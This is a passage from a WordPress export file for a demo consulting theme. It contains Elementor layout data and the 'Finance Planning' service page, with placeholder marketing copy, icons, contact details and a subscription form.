functions","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"6aee619","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"finance planning","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"cd97531","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":15,"sizes":[]},"icon_color":"#4B83FC","icon_size":{"unit":"px","size":6,"sizes":[]},"text_color":"#1B1D21","text_color_hover":"#4B83FC","text_indent":{"unit":"px","size":10,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_family":"Inter","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_font_weight":"600","icon_typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"adb2e77","elType":"widget","settings":{"title":"Contacts","header_size":"h5"},"elements":[],"widgetType":"heading"},{"id":"64a2dd8","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"5","left":"0","isLinked":false}},"elements":[{"id":"87b1729","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"f10f882","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"9647d28","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"89800c0","elType":"widget","settings":{"text":"Divider","color":"#4B83FC","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"a10b197","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#4B83FC","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"1f4fc86","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#4B83FC","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"7074fb9","elType":"widget","settings":{"title_text":"Mail Us","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#4B83FC","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"mailto:maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"cea57b4","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/img-btn-pdf-home2.jpg","id":1510},"image_size":"full","align":"left","link_to":"custom","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"46e8c8c","elType":"section","settings":{"content_width":{"unit":"px","size":1370,"sizes":[]},"margin":{"unit":"px","top":"-75","right":0,"bottom":"-75","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"-20","right":0,"bottom":"-75","left":0,"isLinked":false},"z_index":1,"margin_mobile":{"unit":"px","top":"-60","right":0,"bottom":"60","left":0,"isLinked":false}},"elements":[{"id":"d24b9e8","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"d2d1f48","elType":"section","settings":{"content_position":"middle","structure":"20","background_background":"classic","background_color":"#4B83FC","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":8,"vertical":8,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding":{"unit":"px","top":"50","right":"45","bottom":"50","left":"45","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"padding_mobile":{"unit":"px","top":"40","right":"20","bottom":"40","left":"20","isLinked":false}},"elements":[{"id":"372cda6","elType":"column","settings":{"_column_size":50,"_inline_size":30,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"0c8a5bd","elType":"widget","settings":{"title":"Ready to Get Started?","header_size":"h4","title_color":"#FFFFFF","typography_font_weight":"600","typography_font_size_mobile":{"unit":"px","size":22,"sizes":[]}},"elements":[],"widgetType":"heading"}],"isInner":true},{"id":"e6f6fbb","elType":"column","settings":{"_column_size":50,"_inline_size":70,"_inline_size_tablet":100},"elements":[{"id":"1f8571e","elType":"widget","settings":{"cf7":"741","_background_background":"classic","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_border_radius_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"css_responce":"color:#fff;"},"elements":[],"widgetType":"ictf7"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:10:{s:5:"image";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:3;s:10:"image_size";i:3;s:5:"align";i:1;s:7:"link_to";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:2:{s:19:"image_border_radius";i:2;s:5:"width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:6;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:6;s:11:"header_size";i:6;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}s:5:"style";a:1:{s:19:"section_title_style";a:4:{s:21:"typography_typography";i:1;s:27:"typography_font_size_mobile";i:2;s:22:"typography_font_weight";i:2;s:11:"title_color";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:5;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:5;}}s:8:"advanced";a:2:{s:14:"_section_style";a:4:{s:8:"_padding";i:4;s:15:"_padding_mobile";i:2;s:7:"_margin";i:2;s:12:"_css_classes";i:1;}s:15:"_section_border";a:3:{s:14:"_border_border";i:1;s:13:"_border_width";i:1;s:13:"_border_color";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:1;s:22:"typography_font_family";i:1;s:22:"typography_font_weight";i:1;s:21:"typography_typography";i:1;s:27:"typography_font_size_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:3;s:5:"title";i:3;s:7:"percent";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:2;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:3;}}}}s:6:"column";a:3:{s:5:"count";i:16;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:16;s:19:"_inline_size_tablet";i:4;s:19:"_inline_size_mobile";i:4;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:13:"margin_tablet";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:9;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:4:{s:3:"gap";i:6;s:6:"layout";i:5;s:16:"content_position";i:1;s:13:"content_width";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:6;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:7:{s:7:"padding";i:6;s:14:"padding_mobile";i:3;s:6:"margin";i:3;s:13:"margin_mobile";i:3;s:14:"padding_tablet";i:1;s:13:"margin_tablet";i:2;s:7:"z_index";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:6:{s:21:"background_background";i:3;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:13:"border_radius";i:3;s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:2;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:2;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:2;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:2;s:9:"icon_size";i:2;}s:18:"section_text_style";a:8:{s:11:"text_indent";i:2;s:10:"text_color";i:1;s:16:"text_color_hover";i:1;s:26:"icon_typography_typography";i:1;s:27:"icon_typography_font_family";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_font_weight";i:1;s:30:"icon_typography_text_transform";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}}}s:7:"divider";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:4;s:3:"gap";i:4;s:6:"weight";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:12:"_css_classes";i:2;s:7:"_margin";i:2;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:5:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;s:10:"icon_space";i:3;s:17:"icon_space_mobile";i:3;}s:21:"section_style_content";a:12:{s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;s:17:"text_align_mobile";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:3;s:14:"_margin_mobile";i:2;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:2:{s:19:"_section_background";a:1:{s:22:"_background_background";i:1;}s:15:"_section_border";a:2:{s:14:"_border_radius";i:1;s:21:"_border_radius_tablet";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:1:{s:12:"css_responce";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[869]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[select_footer]]></wp:meta_key>
		<wp:meta_value><![CDATA[1684]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Finance Planning</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-services/finance-planning/</link>
		<pubDate>Tue, 22 Sep 2020 02:55:25 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=1002</guid>
		<description></description>
		<content:encoded><![CDATA[<img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box6.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box6.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box6-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box6-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px">
<h3>We Conduct Marketing Research</h3>
It’s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique "Today Forward, Future Back" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We’ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.

Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.

75
<h6>marketing analysis</h6>
65
<h6>business innovation</h6>
90
<h6>finance strategy</h6>
<h3>We are Always Ready to Assist Our Clients</h3>
developing financial processes and procedures
<h4>How It Works &amp; How We Do It</h4>
Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.
<ul>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

there are projects that require temporary expansion of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.</li>
</ul>
<blockquote>“I cannot give you the formula for success, but I can give you the
formula for failure. It is: Try to please everybody.”
<cite>david oswald</cite></blockquote>
<h4>Business Planning &amp; Strategy</h4>
<img width="466" height="296" src="https://maxbizz.s3.amazonaws.com/images/chart1-service-home2.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart1-service-home2.png 466w, https://maxbizz.s3.amazonaws.com/images/chart1-service-home2-300x191.png 300w" sizes="(max-width: 466px) 100vw, 466px">

Nurture promoters, your loyal customers who are more profitable and will advocate for your business—both in good times and bad.

Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.
<h5>Services</h5>
<ul>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/marketing-research">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

marketing research
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

Organizational Audit
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/business-consulting">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

business consulting
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

project management
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

support functions
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

finance planning
</a></li>
</ul>
<h5>Contacts</h5>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
<h6>
					Visit Us Daily</h6>
411 University St, Seattle

<a href="tel:+1-800-456-478-23">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</a>
<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a></h6>
+1-800-456-478-23

<a href="mailto:maxbizz@mail.com">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>				</a>
<h6>
					<a href="mailto:maxbizz@mail.com">Mail Us</a></h6>
maxbizz@mail.com

<a href="#">
<img width="270" height="90" src="https://maxbizz.s3.amazonaws.com/images/img-btn-pdf-home2.jpg" alt="" loading="lazy">								</a>
<h4>Ready to Get Started?</h4>
<p role="status" aria-live="polite" aria-atomic="true"></p>

<ul></ul>
<form action="/maxbizz-consulting/wp-admin/admin-ajax.php#wpcf7-f741-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="741">
<input type="hidden" name="_wpcf7_version" value="5.3">
<input type="hidden" name="_wpcf7_locale" value="en_US">
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f741-o1">
<input type="hidden" name="_wpcf7_container_post" value="0">
<input type="hidden" name="_wpcf7_posted_data_hash" value="">
<input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *">
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *">
<button type="submit">Subscribe Now</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1002</wp:post_id>
		<wp:post_date><![CDATA[2020-09-22 02:55:25]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-22 02:55:25]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[finance-planning]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
